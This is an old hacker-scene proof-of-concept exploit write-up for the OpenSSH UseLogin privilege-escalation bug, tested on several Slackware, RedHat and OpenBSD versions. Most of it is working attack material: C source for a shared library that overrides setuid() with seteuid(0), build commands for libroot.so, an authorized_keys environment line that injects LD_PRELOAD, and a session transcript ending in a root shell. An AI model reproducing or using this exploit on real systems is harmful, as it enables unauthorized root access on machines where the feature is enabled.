--[ OpenSSH UseLogin bug proof of concept exploit ]-- by [WaR] / http://www.genhex.org --[ Intro ]-- I was very curious in finding out how to exploit this problem. Although I don't think anyone uses this feature, I looked into the matter anyway. Here it goes. It was tested on the following platforms: - Slackware 7.1 with OpenSSH3.0p1 - RedHat 7.1 with OpenSSH_2.9p2 - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio) - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac) The exploit should work as long as UseLogin does. YMMV. This is based on libroot from squidge@onyx.infonexus.com, published a few years ago for exploiting the telnetd LD_PRELOAD bug (and you thought it wouldn't happen again...). Kudos to pmsac@toxyn.org for his help figuring out the problem with the Slackware UseLogin, testing on OpenBSD, and giving the ideia for the seteuid(0) (it originally was a system("/bin/sh");). --[ Code ]-- Create a lib.c file with the next content: ---8<--- #include int setuid(int uid){ printf("setuid() called...\n"); seteuid(0); } ---8<--- Compile it into a library: gcc -c -o lib.o lib.c ld -shared -o libroot.so lib.o chmod 755 ./libroot.so Now, for the tricky (*g*) part... You must have an account on the machine, and create an entry on $HOME/.ssh/authorized_keys (or authorized_keys2) with: environment="LD_PRELOAD=/libroot.so" When sshd receives your connection, it will export this variable into the environment *BEFORE* running login. Somewhere after this, it executes a setuid. When it does, it makes a seteuid(0). $ id uid=1000(war) gid=100(users) groups=100(users) $ ssh war@localhost Enter passphrase for key '/home/war/.ssh/id_dsa': sh-2.04# id uid=0(root) gid=100(users) groups=100(users) It also works remotely. Anyway, you _MUST_ have an account on the victim machine so you can setup the enviroment, and login. And obviously (duh) it must have UseLogin enabled. That's all. shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org. -- [WaR] "If you can't hack it, hit it with a hammer"